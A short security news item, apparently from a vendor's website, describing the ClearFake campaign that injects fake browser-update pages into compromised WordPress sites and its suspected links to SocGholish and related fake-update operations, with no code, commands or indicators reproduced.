HQ/EMEAFind out how we can help your business
The newly discovered ClearFake malware operators have leveraged fake browser updates to infect targeted users.
Based on reports, that tactic in this campaign resembles SocGholish and FakeSG campaigns’ social engineering methods to deceive users into installing fraudulent web browser updates. The individuals or groups managing ClearFake launch the watering hole strategy to insert malicious JavaScript code into infected WordPress websites.
In this process, the threat actors utilise the Keitaro TDS filtering service to reroute web traffic. This strategy will lead users to fake browser update pages. Next, these bogus update pages could mimic the download pages of popular browsers like Chrome, Edge, and Microsoft.
Once an unsuspecting user clicks the update button, it will download harmful payloads hosted on platforms such as Dropbox and OneDrive.
The SocGholish operators are the primary suspects in managing the new ClearFake malware.
The same group responsible for the SocGholish malware attacks last year could be the operators of the new ClearFake malware since they have consistently used the same strategy since 2022.
Late last month, ClearFake modified its code injection tactics since the injected code previously had a base64 encoded script added to the HTML of compromised webpages. Still, lately, it has relied on intelligent contracts from Binance Smart Chain.
Separate research has identified at least four distinct threat clusters employing fake browser updates for malware distribution. One of these threats could have connections to the ClearFake campaign.
In addition, another campaign linked to SocGholish malware has been in use for over five years to distribute various malicious software, such as AsyncRAT and NetSupport. Furthermore, a FakeSG campaign delivered the NetSupport RAT to victims’ systems.
A couple of months ago, another cluster of fake update campaigns appeared featuring the SmartApeSG, which downloaded the NetSupport RAT onto compromised systems.
Since fake browser updates remain one of threat actors’ most prevalent techniques for delivering malware, organisations must proactively monitor their endpoints and networks to mitigate such threats.
Lastly, indicators of compromise (IOCs) associated with this threat are now available so organisations can gain insights into the attackers’ infrastructure, attack patterns, and activities.
